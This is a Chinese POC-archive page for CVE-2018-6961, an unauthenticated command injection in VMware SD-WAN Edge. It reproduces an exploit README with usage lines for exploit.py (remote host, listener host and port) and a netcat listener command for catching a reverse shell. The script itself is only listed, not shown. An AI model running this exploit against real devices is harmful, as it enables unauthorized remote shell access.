支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:752

75.2%

POC详情: f7f3b59e6abcc6f61b8ce969454607bb98482017

来源
关联漏洞
标题:VMware SD-WAN Edge 命令注入漏洞 (CVE-2018-6961)
描述:VMware SD-WAN Edge是美国威睿(VMware)公司的一套网络和安全虚拟化平台。该平台为虚拟机提供部署在普通IP网络硬件上、可编程以及可移动的虚拟网络。 VMware NSX SD-WAN Edge by VeloCloud 3.1.0之前版本中的local Web UI组件存在命令注入漏洞。远程攻击者利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。
描述
veloCloud VMWare - Vulnerability
介绍
**CVE-2018-6961 - UNAUTHENTICATED COMMAND INJECTION VULNERABILITY**

This exploit works in Python2.7 - Not tested in any other version

**1) Install Dependencies**
```
pip install request
```

if don't have pip installed, just run
```
apt-get install python-pip
```

**2) Usage **
```
python exployt.py --rhost --interface --lhost --lport --function
```
```
python exploit.py --rhost 1.1.1.1 --interface ge1 --lhost 2.2.2.2 --lport 443 --function traceroute
Exploiting...................
```

**3) Don't forget to setup the netcat on another terminal**
```
nc -vlnp 443
```



TODO
--improve the script to run the netcat on the same terminal

文件快照

[4.0K] /data/pocs/f7f3b59e6abcc6f61b8ce969454607bb98482017 ├── [3.2K] exploit.py └── [ 643] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。